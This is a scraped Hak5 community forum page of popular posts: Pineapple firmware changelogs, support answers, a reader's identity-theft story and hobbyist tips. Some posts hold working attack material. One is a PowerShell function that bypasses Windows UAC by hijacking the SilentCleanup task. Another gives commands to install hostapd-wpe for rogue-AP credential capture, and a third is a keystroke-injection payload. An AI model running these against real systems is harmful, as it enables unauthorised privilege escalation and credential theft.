Jump to content


Popular Content

Showing content with the highest reputation since 02/28/2020 in all areas

  1. 6 points
    I haven't had a chance to read this entire thread but I can respond to the OP and say, absolutely not, Hak5 is very much alive. I understand that we haven't put out many of our regular videos lately. Personally I've been taking a bit of a hiatus to restructure some things in my life that needed attention. With that said we have a lot of great programming right around the corner coming to the channel - some familiar faces, some new faces, and some fantastic shows all around. Stay tuned for a channel teaser in the next few weeks.
  2. 5 points
    Hi! We're pleased to announce a new release for the WiFi Pineapple NANO: 2.7.0. This update addresses some of the bugs reported by the great community here on the forums and in the Hak5 Discord, as well as updates to some community packages and updates to OpenWRT. 2.7.0 Changelog: General OpenWRT version is now 19.07.2. Kernel has been updated from 4.14.133 to 4.14.171. Fixed an issue where OpenVPN would cause a kernel panic upon establishing tunnel. Recon Fixed an issue where live scans would fail on the WiFi Pineapple TETRA. Reporting Fixed an issue where emails would not be sent. Improved the user experience by automatically saving email settings when testing emails. Improved the user experience by forcing an email to send when testing, regardless of whether the "Send Email" option was checked. Advanced Fixed an issue where swap would not be mounted automatically on the NANO's SD Card. Renamed "USB" panel to "USB & Storage". Misc Added SSLSplit package to repositories. This fixes the SSLSplit module dependencies. Updated Kismet package in repositories. Updated Kismet-RemoteCap package in repositories. You can update your WiFi Pineapple NANO Over-The-Air via the Advanced module or manually at the Hak5 Download Center. β™₯ - The Hak5 Development Team
  3. 5 points
    Seems unnecessarily aggressive...
  4. 4 points
    Hi! We're pleased to announce a new release for the WiFi Pineapple TETRA: 2.7.0. This update addresses some of the bugs reported by the great community here on the forums and in the Hak5 Discord, as well as updates to some community packages and updates to OpenWRT. 2.7.0 Changelog: General OpenWRT version is now 19.07.2. Kernel has been updated from 4.14.133 to 4.14.171. Fixed an issue where OpenVPN would cause a kernel panic upon establishing tunnel. Recon Fixed an issue where live scans would fail on the WiFi Pineapple TETRA. Reporting Fixed an issue where emails would not be sent. Improved the user experience by automatically saving email settings when testing emails. Improved the user experience by forcing an email to send when testing, regardless of whether the "Send Email" option was checked. Advanced Fixed an issue where swap would not be mounted automatically on the NANO's SD Card. Renamed "USB" panel to "USB & Storage". Misc Added SSLSplit package to repositories. This fixes the SSLSplit module dependencies. Updated Kismet package in repositories. Updated Kismet-RemoteCap package in repositories. You can update your WiFi Pineapple TETRA Over-The-Air via the Advanced module or manually at the Hak5 Download Center. β™₯ - The Hak5 Development Team
  5. 3 points
    The device has been on the market since 2015 and in that time has seen continious updates and patches. 2.7 was released a little over a week ago. For a device so buggy and unreliable, many are using it and successfully so. Trust it for what? Your livelihood? Job? A tool is only as reliable as the person using it. If you stake your reputation on a single device, that reflects on your own poor judgement and shows a serious lack of skill in risk planning. It also demonstrates that you really have no idea what you are doing as no one would use a singular device in such a critical test and if they absolutely had to, they'd have the skills and foresight to plan for any issues they may encounter.
  6. 3 points
    Or is this because of supply chain issues due to the outbreak?
  7. 3 points
    https://www.just-fucking-google.it/?s=what is ntopng
  8. 2 points
    In reality it is a combination of things. Most of the time it seems that their are three main purchasing groups for these products. Professionals: They typically have a good understand of the software/firmware being used before purchasing so the transition to the device is easy. In my experience this group will a lot of times not update there device once they have the features they need working. This help prevent issues due to "latest" version firmware and waiting for patches to modules. Hackers/True Enthusiasts: They typically are in it for the joy and learning experience. Help find bugs and issues as well as develop modules. Splurge Buyers: Ones who have no idea how the device works or functions. Most the time individuals who buy the device because they heard it can "hack wifi" so they buy it thinking they will click one button and have the password to any WiFi network they please. Issues seem to come most from the last group as the device did not meet their expectations. Now all groups have unsatisfied users as well but it seems not as much from the first two. This is a very rough overview but I feel this is important information when deciding to purchase the device. I have owned wifi pineapples since the markIV and have hand my ups and downs. Sometimes at the fault of buggy firmware and other times at my own cause. Most recent issues seem to be users not understanding that modules are "community modules" and not developed by the Hak5 team. This is my opinions, and I am in no way calling anyone wrong.
  9. 2 points
    https://forums.hak5.org/topic/28600-do-not-post-wifi-pineapple-related-questions-here/ Very first topic in here.
  10. 2 points
    Be sure that the WiFi Pineapple NANO is provided the requisite 9W of power. See the power consideration article at https://docs.hak5.org/hc/en-us/articles/360010471754-Power-Considerations Essentially, a typical 2A USB source will be adequate - but if an unpowered hub is used with other accessories attached, you'll experience reboots and/or boot loops if the device isn't adequately powered.
  11. 1 point
    πŸ˜„ I have been procrastinating on getting this setup for a while. It was fine for the first 5 episodes being that they were mostly purely instructional setup. But now we are diving deep into the educational aspect that encourages a lot of exploration and collaboration. Let's see how it goes! I'll be adapting future episodes around what I see here.
  12. 1 point
    Just to address this: Devices that are not sold by us or the retailers we partner with are not guaranteed to have not been used in the past. Buying new parts from us directly or the retailers we choose don't come with a password set.
  13. 1 point
    Cherry-picking details from the logs that you deem strange doesn't help us diagnose any potential issues. Full log output is appreciated.
  14. 1 point
    Keep in mind you can always access your WiFi Pineapple's serial console - which will provide a bash terminal on the linux OS - right from the UART port. This is incredibly helpful for debugging as you'll see the system log live as the device boots and while interacting with the shell. Here's more on this feature: https://docs.hak5.org/hc/en-us/articles/360010555553-Serial-Access-WiFi-Pineapple-TETRA
  15. 1 point
    Buy an old school none smart phone, use that for a couple of months instead of your iPhone. Stay off the internet as well during that time. The evil step mother will soon get bored and move on. Also, if she has that level of skill, point her at one of the big big bounty platforms as they millions for people who are able to do what you claim she is doing.
  16. 1 point
    Hello, I recently been a victim of identity theft and I really want to understand how someone or some group did this. So here is what happened: on 1/27/2020 I logged into my banking app and noticed several charges from my checking account to online casinos in NJ. These charges started on 1/3/2020 (and before you ask, yes I’m an idiot who doesn’t check their statement or banking app often). Whoever accessed my checking account was able to sign up for online casinos in NJ with my name and all my info such as date of birth, social security number, address and so forth. My checking account has been drained. I called the bank and they are telling me the activity came from my IP address and the casinos are saying that their geolocation places the transactions at my home. I do live in an apartment complex and the only other person in my home is my boyfriend (he is not computer savvy so I know it wasn’t him. Also I asked him and he said no). I looked into sim swapping but I never lost service on my phone. I did sell my old iPhone online via Swappa. I did a factory reset on my phone before mailing it out. My bank is stating they do not believe these charges are fraudulent (basically they are saying I did this). I currently have a lawyer and disputing this issue with my bank. What I really want to understand is how this happened and how I can protect myself in the future. Any help or advise is greatly appreciated. sincerely, broke and confused
  17. 1 point
    πŸ˜‚ And Kids using kali so they can say thery are Elite.
  18. 1 point
    Regardless, these are buggy as hell and unreliable. They're cool for a hobbyist thing but would never trust it and wouldn't recommend anyone else does either.
  19. 1 point
    Could you let me know your order number via a forum message? Thanks.
  20. 1 point
    Yes. The ATTACKMODE command supports spoofing multiple ID values including VID, PID, Manufacturer, and Serial Number.
  21. 1 point
    It's so sad that there even has to be a pinned topic "do not post....". Why can't people just like scroll down??? There are different sections for every tool.
  22. 1 point
    Too long, and that's my fault. I really need to find a scalable solution to this but thus far haven't.
  23. 1 point
  24. 1 point
    https://forums.hak5.org/forum/56-usb-rubber-ducky/ Check in the correct section of the forums.
  25. 1 point
    One of the biggest gaps I have found with the pineapple is the inability to perform hostapd-wpe type attacks. Thankfully, there is a OperWRT package for hostapd-wpe that seems to work very well... I just wanted to share in case anybody else needed the Pineapple to do this also.... ssh to your pineapple... ######## cd /tmp wget https://github.com/TarlogicSecurity/hostapd-wpe-openwrt/raw/master/packages/ar71xx/generic/hostapd-wpe_2014-06-03.1-1_ar71xx.ipk opkg install ./hostapd-wpe_2014-06-03.1-1_ar71xx.ipk ###### The configuration files are in /usr/local/etc/hostapd-wpe I changed the wifi to wlan1 and executed with hostapd-wpe ./yourconfig.conf Unfortunately I havent had the time to create a gui for it... I would love to see this integrated into PineAP functionality at some point... but until then, I hope somebody has the time and passion to wrap a GUI around it!! Hope this helps somebody out.
  26. 1 point
    Lol, this isn't a Darren issue. It is MS doing their due diligence and fixing an issue. If you want to get hashes from locked machines, you will need to come up with a new method....not Darren. He has given you the tool to use whatever you come up with. Use it damnit.
  27. 1 point
    Why do you ping Darren... Why do you say "agree". How can you agree to an answer to a question you asked. What do you mean with "locked computer" problem? It is not a "problem" that the computer is locked. It is a requirement, because we assume that the computer is locked and we want to have a payload that works with locked computers.
  28. 1 point
    O.MG Cable Usage
  29. 1 point
    Didn't know about the users, thanks! Found the VNC.start indeed, mine says I inserted the -noviewonly and -forever myself, didn't help. When I look at the running processes X11 actually runs with those parameters but it's still viewonly.
  30. 1 point
    Oh, nice. Didn't knew about that site. I think I will use that for semi-stupid questions in future. But don't get me wrong. Whenever you have a question, ask it. I'm not blaming and I never will blame someone for asking basic/"noob" questions. I'm against people, who don't even think of doing something by themselves. They just ask something and hope somebody will answer them, they don't even google it. If you show effort, you'll get your answers, I'm sure. You know, I would surely post a more detailed answer to a question like "I don't understand how <something> works. I googled it and tried troubleshooting by myself, here's what I already did: <examples>. Could somebody please give me some hints?" than to a question like "can somebody explain <something>".
  31. 1 point
    Thanks Darren I'm looking forward to it! Also if there's any chance that either on here or through a video that you could give us an update on pretty much everything that would be great. I'd be interested to know what happened to Tekthing, where it's going or if it's coming back. Anything new from Mubix. I've heard some people say you've all moved. Not asking for anything too personal from everyone but I've been watching Hak5 since the beginning so any updates would be greatly appreciated. I do miss that weekly dose of technolust!
  32. 1 point
    Question: is the external USB hub powered, or is an unpowered hub?
  33. 1 point
    You'll learn nothing if you just copy-paste the payloads. And yes, they work on windows 10. And also, we can't help you if you just say "it doesn't work", please describe your problem first. Like idk where the problem is, when you don't describe it. I shouldn't even answer you because you are at the wrong part of the forum as jtyle6 already said. Please make another post.
  34. 1 point
    "\$" escapes question mark. "\\" escapes back slash. "\\\$" escapes back slash and question mark.
  35. 1 point
    I have to say, i also have noticed the decline in new content, and feel a little sad, i really miss the show. But, on that note, i actually worry more about the crew, if they are okay, doing good and hopefully are busy with day to day life and work πŸ™‚ But, producing digital content / media content IS a lot of work. A good crew, can produce 45 minuttes of content in 7 working days. Lets remember that Darren, Snubs and the rest, did all this, because their hearts burned for it, they believed in it. So, i think it's fair they take some time off, they deserve it more than anyone. Maybe, it could be time for someone else to carry the torch, make new content, and ask H5 to just distribute it, if they want. Anyone willing to step up to the plate ? But, lets face it. Researching "hacking", and being public about it, are hard times. I ran my own little research shop, and my own small infrastructure, focusing on Kali, lockpicking, alarmsystems and CCTV. I just shut down shop, because it was giving me problems, so as a "hacker", these are not good times. I believe its important to share knowledge, to do what we can to inform the public, but right now, i'm thinking "why bother". All my best, to the entire Hak5 crew, past and present, and thanks for being there, for everythng you did, and still do. It's very much appreciated πŸ™‚
  36. 1 point
    Yeah, would be good to get some clarity......but the Threat Wire and Shannon Morse are still showing via Hak5 on youtube, so all a bit strange.......
  37. 1 point
    Shannon Morse is moving Threat Wire to Colorado in two weeks.........lock, stock.....the lot!
  38. 1 point
    New Tetra? If only we can get the old one fully functional first.
  39. 1 point
    Yes @Idk_Man I did perform the Firmware-Recovery procedure the way you describe using the Firmware Recovery Image - https://docs.hak5.org/hc/en-us/articles/360010471774-Firmware-Recovery . I'm glad you managed to duplicate the issue. I'll try to use your solution and report back. Thank you for figuring it out!
  40. 1 point
    Everyone also has to realize that if Hak5 we're to become responsible for producing the 3rd party modules, they would open themselves up to all sorts of nasty lawsuits and the fed's would quickly shut them down. Hak5 is responsible for the physical NANO and it's main operating system; nothing else. Everything else is left open to the community. It's no different than any other product on the open market available for consumers. EXAMPLE: Anyone can legally buy an ordinary pencil from a store. No big deal, right? However the end user has the choice on how they wish to use the pencil. They can choose to use the pencil in a legal manner - on paper - or use the pencil to stab someone in the eyeball (now that pencil become an illegal weapon). The pencil itself isn't illegal by nature. How the pencil is used by the end user determines the legality of the pencil. **Hypothetically** (Don't do this!) if you walk into any police station and try to have them arrest you for carrying a normal, everyday pencil, they'd look at you like you were insane. You won't get arrested for walking around with a pencil on your person. Now take that same pencil in our hypothetical situation and stab that same police officer (Don't do this!) who just said he won't arrest you for carrying around a pencil. You'll get jumped and arrested before you even know what's going on (and you'll probably get 6 warning shots to the back for good measure lol) You as the end user took a perfectly legal item and just turned it into an illegal weapon. Is that the fault of the pencil company? Absolutely not. The pencil company only produces legal pencils for its customers. That end user decided to use the pencil in an illegal manner. So, if Hak5 decided to start writing their own modules with their name on it which allowed end users to use their product in an illegal manor, the NANO would then become illegal object to own. (Imagine if the same pencil company put instructions on how to stab people with their pencils on their boxes) How quickly would that company be getting dragged into court? 1 day? It's up to the Hak5 community to write our own modules and decide for ourselves on how to use the NANO. So if you're unhappy about the 3rd party modules not working quite right, I suppose you'd better brush up on your coding and make the necessary edits to allow you to accomplish your own end goals. If you break it down the NANO is really just running the Kali Linux software inside a custom built hardware shell. And last time I checked, owning a Kali Linux OS is not illegal. How you use it determines the legality.
  41. 1 point
    Hey, great you found your way to the Hak5 Forum. What really confuses me are those several points (how they could do this): 1. I assume that you have 2-Factor Authentication on, else you would be really dumb. Sorry but this is your banking account. It is hard to trick 2FA but it can be done, for example with a phishing site that also crabs your cookies. That means they got your cookies and the cookies tell your E-Banking website that you've logged in 2 minutes ago and you don't have to do 2FA right now. 2. I'm not an expert, but I think it is really hard to trick the ip address and that it still fits with the geological place. Idk how they did it, but I have an idea. My theory on how they did this: I think you got tricked and they got access to your pc. Else, I couldn't imagine how they should trick all systems. My guess: they got your login password of your computer somehow. How did they got it? I don't know, maybe you got phished and your facebook password is the same as your computer password. Or they phished your Microsoft password, and with that they can also login to your computer. You can remotely log into a computer as long as you have the login credentials and the other computer is turned on. After they got access to your computer they logged into your banking account from your computer. Idk how your settings are but some people don't have to do 2FA from their personal devices each time they log in. How did they got your bank password? That's easy if they have access to your computer. 2FA is very important. That would also explain why it came all from your IP-address and your location. Because it was your computer who did it, he was just remotely controled. What I recommend you to do: First of all, let your antivirus do a full scan of your computer. Maybe they did place a keylogger on your PC in case you would reset your passwords. If that would be the case, they would also have the new passwords, which would make your whole security crumble. Sometimes keyloggers also don't get detected by AV's, so be sure to look at the processes on the task manager from time to time and check if there are some suspicious apps running. Second: Untrust all devices you have. By that I mean that your phone probably knows that your computer is a trusted device and won't message you if someone logs into a account of yours (from the computer). I would reset all passwords, untrust and re-trust your devices, and turn all possible security features on (for example 2FA). Just do a reset, like you would buy a new phone. I don't mean to do a factory reset or delete all files, just renew your accounts and passwords. I know this is a lot of work and it is very boring, but it is only for your security. If you see again suspicious activity on your banking, immediatly block it. It saves you a lot of money and work. let me know if there is anything else you would like to say cheers
  42. 1 point
    I currently have my Raspberry Pi 4 (4GB) setup running Kismet. I then have both my Pineapple Nano and Tetra running "kismet-remote", sending the captures to the Kismet server on the Raspberry Pi. The Tetra is actually powerful enough to run the main kismet server, though not with the same peformance as on the Raspberry. Using the above setup gives me the same peformance as running kismet on my desktop.
  43. 1 point
    https://www.kismetwireless.net/docs/readme/git_and_beta/ has guides for installing and setup. Not sure on performance of doing this with the tetra but have seen what you are wanting done with R Pi.
  44. 1 point
    all these modules including EP are 3rd party modules and going from MK5 to MK6 this module was completely redesigned. This not fluxion because its not for script kiddies to just run and get results, if you want a specific portal, make it. I dont disagree that some of the functionality is off but if you can make it better.... why bitch about, help the developer. These guys take time out there own busy schedules to help make these and are not paid by hak5 nor are any of the modules supported by hak5.
  45. 1 point
    Have to agree here. It is a real eye opener, but I get the feeling that the DC may hold more that could not be shown.........😎
  46. 1 point
    I'm a sysadmin in my day job....A LOT of sysadmins only have very basic knowledge of security. I don't want to be one of those sysadmins.
  47. 1 point
    function sudo { $command = "powershell -noexit " + $args + ";#"; Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value $command ; schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I; Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir" } Quick function that works like sudo πŸ™‚
  48. 1 point
    Okay, I came up with some steps for the new comers to get up and going on their BBs. This includes testing your BB after you got it to make sure it is working and then updating. 1) After you get your bunny, stick it in arming mode. Switch position closest to the USB port. 2) Put BB in computer. It should come up as a USB storage device. 3) Inspect the device has a loot, tools and payload folder 4) In the payload folder go into switch1 folder. 5) In the payload.txt file clear all text out of it and put the following. This for windows machines. ATTACKMODE HID LED G R Q DELAY 5000 Q GUI R Q DELAY 500 Q STRING notepad Q DELAY 500 Q ENTER Q DELAY 2000 Q STRING "Hello World" Q DELAY 500 Q ENTER LED B R ATTACKMODE RNDIS_ETHERNET LED G 6) On windows the above should open up notepad and type hello world. After that it will switch to attackmode ethernet for windows. 7) At this point you can try and ping If you get a ping back, ethernet seems to be up. Now, try and use putty to ssh into the BB using root as login name and hak5bunny as password. If you get in, your bunny should be golden at default. Now, time for the fun part. On this part you are going to firmware upgrade the Bunny. Only a few people have had bad luck with this, most of the issues have been from lack of patience. It takes awhile, on mine it took 5-10mins so make sure your machine is plugged into live power and the USB port you are using is good. You want no interruptions. Kill that USB powersave mode too. Now, download the firmware from here and do check checksum, it is there for you to make sure your download was not corrupted. https://wiki.bashbunny.com/#!downloads.md Unplug the bunny and switch it back to arming mode, switch position closest to USB port and put back in. When the storage for it comes up, copy the file still compressed to the root of the bunny storage folder (not in loot, not in tools and not in payloads). Safely eject bunny from Windows and unplug the bunny from the usb port, wait 5-10 seconds and plug it back in and do the hardest part.....wait. If upgrading from 1.0, the led will flash red while it is flashing. It will flash red for awhile. Let it flash red, leave it alone, do not do stuff on computer that it is plugged into, go do something else. When it is done it will flash blue and your BB storage will show up again. From this part you copy the tools from this forum thread to the tools folder on the BB storage drive. After you have done that, tell Windows to eject the BB drive so it is sure to sync and not create a dirty bit. (whenever you are going to disconnect in arming mode, always eject the BB) Wait 5 seconds and plug it back in and wait. When the BB is done installing the tools, the storage drive will show up again for the BB. At this point you should be updated and ready to go. Go grab some payloads and try them out. Copy the contents of one of the payload's folder to a switch folder. Do not copy the folder itself into the switch folder, just what i inside the folder (contents). If you storage folder is operational but empty like it has gotten erased, you will have to serial into the BB while in arming mode and do a " udisk reformat". Adding folders by hand back in will not work due to permission differences. Serialing into the BB can be found on the wiki here, along with SSH instructions and emergency firmware recovery. https://wiki.bashbunny.com/#!index.md
  49. 1 point
    This has been very high on my todo list. I'll see if I can speed it up.
  50. 1 point
    I keep different versions of the file depending on the use case. Many times I'm looking to grab unassociated clients in a particular area. For that purpose I have a file of just the top 100, public, free wifi points in the area. Throughout a week of capturing clients, the Nano will pick up more SSIDs during the course of doing business. At the end of the week the top 100 file gets reloaded to the /etc/pineapple/. I've found that once you reach a ridiculous number of SSIDs, it takes a longer time to capture a device if you get it to associate at all. Having a targeted list along with watching for SSIDs being beaconed by the client seems to work pretty well. Within the /etc/pineapple/ directory make yourself some copies of ssid_file. In my case it may look like this: cp ssid_file myTop100ssids cp ssid_file topssidsinKentucky cp ssid_file topssidsinCleveland Next, edit each one of these copies to your specifications. I use nano. nano myTop100ssids After editing press [Ctrl o] to save and [Ctrl x] to exit. To load up a file type for use. cp myTop100ssids ssid_file This will copy myTop100ssids and rename it ssid_file for use by the pineapple. Forgive me if this is something you were already aware of how to do but I thought it might help based on the question. Have a great day!
  • Create New...